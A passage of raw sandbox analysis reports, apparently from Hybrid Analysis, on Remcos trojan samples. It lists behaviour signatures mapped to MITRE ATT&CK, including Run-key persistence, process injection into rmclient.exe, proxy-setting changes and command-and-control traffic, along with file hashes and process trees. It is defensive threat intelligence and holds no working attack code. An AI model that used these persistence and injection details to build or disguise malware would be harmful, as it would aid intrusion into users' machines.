\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"FindNextFileW\" with parameter ACEDAO.DLL (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"FindNextFileW\" with parameter ADDINS (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"FindNextFileW\" with parameter ADVCMP.DIC (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"FindNextFileW\" with parameter ADVTEL.DIC (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"FindNextFileW\" with parameter ADVZIP.DIC (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"FindNextFileW\" with parameter ASCIIENG.LNG (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"FindNextFileW\" with parameter AUDIOSEARCHLTS.DLL (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"FindNextFileW\" with parameter AUDIOSEARCHMAIN.DLL (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"FindNextFileW\" with parameter AUDIOSEARCHSAPIFE.DLL (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"FindNextFileW\" with parameter AUTHZAX.DLL (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"FindNextFileW\" with parameter BCSAutogen.dll (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"FindNextFileW\" with parameter BCSClient.Msg.dll (UID: 00000000-00004436)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"app.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00004436)\n \"app.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00004636)\n \"app.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00003064)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-54", "type": 7, "relevance": 1, "name": "Making HTTPS connections using secure TLS/SSL version", "description": "Connection was made using TLSv1.2 [tls.handshake.version: 0x0303]", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" opened \"\\Device\\KsecDD\"\n \"app.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LANMANWORKSTATION\\PARAMETERS\"; Key: \"RPCCACHETIMEOUT\"; Value: \"\")\n \"app.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")\n \"app.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"app.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"app.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"app.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"app.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"app.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"app.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"app.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"app.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"app.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"app.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-191", "relevance": 5, "name": "Calls an API used to open a process handle", "description": "Observed import api \"OpenProcess\" which can be \"used to open a process handle\" [Source: fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645]\n Observed import api \"OpenProcess\" which can be \"used to open a process handle\" [Source: app.exe]", "origin": "Static Parser", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-193", "relevance": 5, "name": "Calls an API used to change the configuration parameters of a service", "description": "Observed import api \"ChangeServiceConfig\" which can be \"used to change the configuration parameters of a service\" [Source: fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645]\n Observed import api \"ChangeServiceConfig\" which can be \"used to change the configuration parameters of a service\" [Source: app.exe]", "origin": "Static Parser", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" reads file \"C:\\Users\\%OSUSER%\\Searches\\desktop.ini\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" reads file \"C:\\Users\\%OSUSER%\\Videos\\desktop.ini\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" reads file \"C:\\Users\\%OSUSER%\\Pictures\\desktop.ini\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" reads file \"C:\\Users\\%OSUSER%\\Contacts\\desktop.ini\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" reads file \"C:\\Users\\%OSUSER%\\Favorites\\desktop.ini\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" reads file \"C:\\Users\\%OSUSER%\\Music\\desktop.ini\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" reads file \"C:\\Users\\%OSUSER%\\Downloads\\desktop.ini\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "static-92", "relevance": 5, "name": "PE file has unusual entropy resources", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645\" has resource with unusual entropy \"RT_RCDATA:7.851624448056896\"\n \"app.exe\" has resource with unusual entropy \"RT_RCDATA:7.851624448056896\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"￐↓↑-HQT17V\"; Value: \"\"%APPDATA%\\firefox tsms\\app.exe\"\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"￐↓↑-HQT17V\"; Value: \"\"%APPDATA%\\firefox tsms\\app.exe\"\")\n \"app.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"app.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"￐↓↑-HQT17V\"; Value: \"\"%APPDATA%\\firefox tsms\\app.exe\"\")\n \"app.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"app.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"￐↓↑-HQT17V\"; Value: \"\"%APPDATA%\\firefox tsms\\app.exe\"\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"app.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%APPDATA%\\firefox tsms\\app.exe]- [targetUID: 00000000-00004436]\n \"app.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645\" has section name .text with entropy \"6.6333094624526705\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645\" has section name .reloc with entropy \"6.670616452336316\"\n \"app.exe\" has section name .text with entropy \"6.6333094624526705\"\n \"app.exe\" has section name .reloc with entropy \"6.670616452336316\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-413", "type": 9, "relevance": 3, "name": "Spawned processes likely due to injection", "description": "Process \"%APPDATA%\\firefox tsms\\app.exe\" spawned likely due to injection\n Process \"%WINDIR%\\system32\\rmclient.exe\" spawned likely due to injection", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-412", "type": 9, "relevance": 5, "name": "Spawned process connects to a network", "description": "Process \"%APPDATA%\\firefox tsms\\app.exe\" connects to <IPv4> on port 8109 (TCP)", "origin": "Monitored Target", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "binary-11", "type": 8, "relevance": 10, "name": "The analysis extracted a file that was identified as malicious", "description": "12/22 Antivirus vendors marked dropped file \"app.exe\" as malicious (classified as \"Trojan.Remcos\" with 54% detection rate)\n 12/22 Antivirus vendors marked dropped file \"app.exe.bin\" as malicious (classified as \"Trojan.Remcos\" with 54% detection rate)", "origin": "Binary File", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "target-58", "type": 9, "relevance": 10, "name": "The analysis spawned a process that was identified as malicious", "description": "12/22 Antivirus vendors marked spawned process \"app.exe\" (PID: 2452) as malicious (classified as \"Trojan.Remcos\" with 54% detection rate)\n 12/22 Antivirus vendors marked spawned process \"app.exe\" (PID: 4636) as malicious (classified as \"Trojan.Remcos\" with 54% detection rate)\n 12/22 Antivirus vendors marked spawned process \"app.exe\" (PID: 3064) as malicious (classified as \"Trojan.Remcos\" with 54% detection rate)\n 12/22 Antivirus vendors marked spawned process \"app.exe\" (PID: 4980) as malicious (classified as \"Trojan.Remcos\" with 54% detection rate)\n 12/22 Antivirus vendors marked spawned process \"app.exe\" (PID: 4696) as malicious (classified as \"Trojan.Remcos\" with 54% detection rate)", "origin": "Monitored Target", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (UID: 00000000-00004436)\n Spawned process \"app.exe\" (UID: 00000000-00002452)\n Spawned process \"rmclient.exe\" (UID: 00000000-00004688)\n Spawned process \"app.exe\" (UID: 00000000-00004636)\n Spawned process \"app.exe\" (UID: 00000000-00003064)\n Spawned process \"app.exe\" (UID: 00000000-00004980)\n Spawned process \"app.exe\" (UID: 00000000-00004696)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\firefox tsms\\app.exe\" (Handle: 1084)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\firefox tsms\\app.exe\" (Handle: 1084)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\firefox tsms\\app.exe\" (Handle: 1084)\n \"app.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\RmClient.exe\" (Handle: 260)\n \"app.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\RmClient.exe\" (Handle: 260)\n \"app.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\RmClient.exe\" (Handle: 260)\n \"app.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\firefox tsms\\app.exe\" (Handle: 1100)\n \"app.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\firefox tsms\\app.exe\" (Handle: 1100)\n \"app.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\firefox tsms\\app.exe\" (Handle: 1100)\n \"app.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\firefox tsms\\app.exe\" (Handle: 1112)\n \"app.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\firefox tsms\\app.exe\" (Handle: 1112)\n \"app.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\firefox tsms\\app.exe\" (Handle: 1112)\n \"app.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\firefox tsms\\app.exe\" (Handle: 1120)\n \"app.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\firefox tsms\\app.exe\" (Handle: 1120)\n \"app.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\firefox tsms\\app.exe\" (Handle: 1120)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-129", "type": 6, "relevance": 10, "name": "Creates a process in suspended mode (likely for process injection)", "description": "\"app.exe\" called \"CreateProcessW\" with parameter \"rmclient.exe\" - (UID: 00000000-00002452)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindFirstFileA@KERNEL32.DLL\" in \"app.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"app.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"app.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"app.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"app.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-7", "type": 7, "relevance": 7, "name": "Uses network protocols on unusual ports", "description": "TCP traffic to <IPv4> on port 8109", "origin": "Network Traffic", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "suricata-2", "type": 18, "relevance": 10, "name": "Detected Suricata Alert", "description": "Detected alert \"ET JA3 Hash - Remcos 3.x/4.x TLS Connection\" (SID: 2036594, Rev: 1, Severity: 1) categorized as \"Malware Command and Control Activity Detected\"", "origin": "Suricata Alerts"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333
https://hybrid-analysis.com/sample/8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333
Hybrid Analysis - Remcos
{"size": 494080, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333", "sha256": "8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333", "av_detect": 88, "vx_family": "Remcos.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 3, "total_signatures": 218, "extracted_files": [{"name": "Word.exe", "file_path": "%ALLUSERSPROFILE%\\Program\\Word.exe", "file_size": 494080, "sha256": "8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe (PID: 4116)", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Remcos", "av_matched": 16, "av_total": 22, "file_available_to_download": true}, {"name": "Word.exe.bin", "file_size": 494080, "sha256": "8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Remcos", "av_matched": 16, "av_total": 22, "file_available_to_download": true}, {"name": "logs.dat", "file_path": "%ALLUSERSPROFILE%\\remcos\\logs.dat", "file_size": 546, "sha256": "9eb6923b998bcfafc9b4ce6d0497688fa9614fac45fc3255e9cf1fea47d78f14", "type_tags": ["data"], "description": "data", "runtime_process": "Word.exe (PID: 5548)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24247)", "100 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24247)"], "imported_objects": ["25 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "34 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24237)", "58 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24237)", "26 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24237)", "2 .OBJ Files linked with ALIASOBJ.EXE 11.00 (Internal OLDNAMES.LIB Tool) (build: 41118)", "1 .CPP Files compiled with CL.EXE 15.00 (Visual Studio 2008) (build: 30729)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a medium codebase (100 files)"], "total_file_compositions_imports": 318}, "processes": [{"uid": "00000000-00004116", "name": "8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe", "normalized_path": "C:\\8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe", "sha256": "8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333", "av_label": "Trojan.Remcos", "av_matched": 16, "av_total": 22}, {"uid": "00000000-00005548", "parentuid": "00000000-00004116", "name": "Word.exe", "normalized_path": "%ALLUSERSPROFILE%\\Program\\Word.exe", "sha256": "8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333", "av_label": "Trojan.Remcos", "av_matched": 16, "av_total": 22}, {"uid": "00000000-00000644", "name": "Word.exe", "normalized_path": "%ALLUSERSPROFILE%\\Program\\Word.exe", "sha256": "8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333", "av_label": "Trojan.Remcos", "av_matched": 16, "av_total": 22}], "mitre_attcks": [{"tactic": "Resource Development", "technique": "Digital Certificates", "attck_id": "T1588.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Obtain Capabilities", "attck_id": "T1588", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588"}}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 2, "informative_identifiers_count": 15}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, 